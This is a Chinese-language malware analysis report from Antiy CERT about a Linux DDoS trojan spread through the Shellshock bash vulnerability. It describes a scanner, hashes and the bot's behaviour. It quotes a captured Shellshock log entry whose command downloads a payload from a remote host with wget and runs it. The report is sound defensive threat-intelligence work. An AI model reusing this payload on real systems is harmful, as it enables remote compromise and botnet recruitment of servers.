[ English ]
编者按
安天CERT这篇分析笔记完成于2015年1月18日,但撰写后并未公开,为让安全工作者更进一步了解IoT僵尸网络的威胁,安天CERT决定公开本报告,作为《IOT僵尸网络严重威胁网络基础设施安全》一文的参考资料。
1 概述
安天CERT关注到近期针对Linux平台的木马十分活跃。2015年1月13日,MalwareMustDie的日本工作人员Hendrik Adrian在推特上发出其分析样本的截图,在1月14日MalwareMustDie官网博客发出分析报告。有趣的是,同是在1月14日,Hendrik Adrian发推表示XOR.DDoS又回来了,该家族早在2014年9月就已经出现,但也有安全媒体发表文章却称该恶意代码是“新型木马”,Avast的报告中也说明了XOR.DDoS自2014年9月末就已经出现,因此可以得出“新型木马的结论”声音并没有对此事件进行深入研究。从各方报告来看,1月13日出现的样本与1月14日出现的XOR.DDoS样本没有关联,下面对1月13日出现的样本进行分析。
该恶意代码在2015年1月13日被发现,通过“破壳”漏洞进行攻击,根据MalwareMustDie的报告,以下是被检测到的攻击代码:
[13/Jan/2015:06:07:18 +0100] "GET / HTTP/1.1" 200 311
"() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521
-O /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
|
它利用“破壳”漏洞下载文件至/tmp文件夹中,通过sh脚本运行。
在2015年1月14日Malware Must
Die的报告中,该C&C服务器包含9521及ck.exe两个文件:
而在1月16日下午13:19:49秒时,文件已经被替换:
从截图上看,有359人下载了名为9521的恶意代码。而另一个名为ck.exe的文件则是一个漏洞扫描器,恶意代码通过它进行传播。
首先分析样本ck.exe:
原始文件名
|
ck.exe |
MD5
|
4E337BE817E4A667FA695E7980B8B851 |
处理器架构
|
X86-32 |
文件大小
|
1.7 MB ( 1816064 bytes ) |
文件格式
|
BinExecute/Microsoft:EXE[:X86] |
时间戳
|
2014-11-08 04:09:02 |
数字签名
|
NO |
加壳类型
|
无 |
编译语言
|
Microsoft Visual C++ |
VT首次上传时间
|
2015-01-13 08:05:48 |
VT检测结果
|
5/57 |
病毒名称
|
Trojan/Linux.ShellShock |
判定结果
|
恶意 |
1、 运行后会弹出帮助
可以看出,它有三个参数:HostFile、Threads、Address,HostFile为txt格式,内容为扫描的目标ip地址,Threads则是线程数量,Address就是恶意代码的地址。
2、 对其反汇编,发现了MalwareMustDie报告中提到了攻击代码,可以看出,该样本扫描有“破壳”漏洞的机器,下载恶意代码并运行
下面分析载荷文件9521:
原始文件名
|
9521 |
MD5
|
B7E3CA05806AA99CAD9D3768FF90F1D9 |
处理器架构
|
X86-32 |
文件大小
|
604.4 KB ( 618948 bytes ) |
文件格式
|
BinExecute/ELF[:X86] |
数字签名
|
NO |
加壳类型
|
无 |
VT首次上传时间
|
2015-01-13 06:04:59 |
VT检测结果
|
17/55 |
病毒名称
|
Trojan[DDOS]/Linux. Znaich |
判定结果
|
恶意 |
1、 样本运行后首先获取系统信息,包括
l 系统版本(通过调用uname())
l 系统时间(调用gettimeofday())
l CPU核心数量及时钟频率(取自/proc/cpuinfo)
l CPU负载(取自/proc/stat)
l 空闲内存大小及内存总量(取自/proc/meminfo)
2、 修改rc.local(利用sed命令):
l 删除末尾的exit 0
l
在第二行增加字符串“//ChinaZ”
3、 解密硬编码的C&C服务器地址
4、 与C&C服务器通信,将之前获取的系统信息通过TCP数据包进行发送
5、 使用Keep-alive机制检测C&C服务器是否存活
该样本通过“破壳”漏洞进行传播,为常见的DDOS攻击样本。但扫描器时间戳为2014年11月,并且攻击者重新上传的样本文件也为2014年的DDOS攻击样本,说明该作者一直在利用“破壳”漏洞进行攻击。
[1]
来源:MalwareMustDie
http://blog.malwaremustdie.org/2015/01/mmd-0030-2015-new-elf-malware-on.html
http://pastebin.com/raw.php?i=gf4xrB9n
[2]
来源:KernerMode.info
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3682&sid=7984f41ec2f98ab870c5a613a116d99e
附录二:关于安天
安天从反病毒引擎研发团队起步,目前已发展成为以安天实验室为总部,以企业安全公司、移动安全公司为两翼的集团化安全企业。安天始终坚持以安全保障用户价值为企业信仰,崇尚自主研发创新,在安全检测引擎、移动安全、网络协议分析还原、动态分析、终端防护、虚拟化安全等方面形成了全能力链布局。安天的监控预警能力覆盖全国、产品与服务辐射多个国家。安天将大数据分析、安全可视化等方面的技术与产品体系有效结合,以海量样本自动化分析平台延展工程师团队作业能力、缩短产品响应周期。结合多年积累的海量安全威胁知识库,综合应用大数据分析、安全可视化等方面经验,推出了应对高级持续性威胁(APT)和面向大规模网络与关键基础设施的态势感知与监控预警解决方案。
全球超过三十家以上的著名安全厂商、IT厂商选择安天作为检测能力合作伙伴,安天的反病毒引擎得以为全球近十万台网络设备和网络安全设备、近两亿部手机提供安全防护。安天移动检测引擎是全球首个获得AV-TEST年度奖项的中国产品。
安天技术实力得到行业管理机构、客户和伙伴的认可,安天已连续四届蝉联国家级安全应急支撑单位资质,亦是中国国家信息安全漏洞库六家首批一级支撑单位之一。
安天是中国应急响应体系中重要的企业节点,在红色代码、口令蠕虫、震网、破壳、沙虫、方程式等重大安全事件中,安天提供了先发预警、深度分析或系统的解决方案。
关于反病毒引擎更多信息请访问: |
http://www.antiy.net (英文) |
安天企业安全公司更多信息请访问: |
|
安天移动安全公司(AVL TEAM)更多信息请访问: |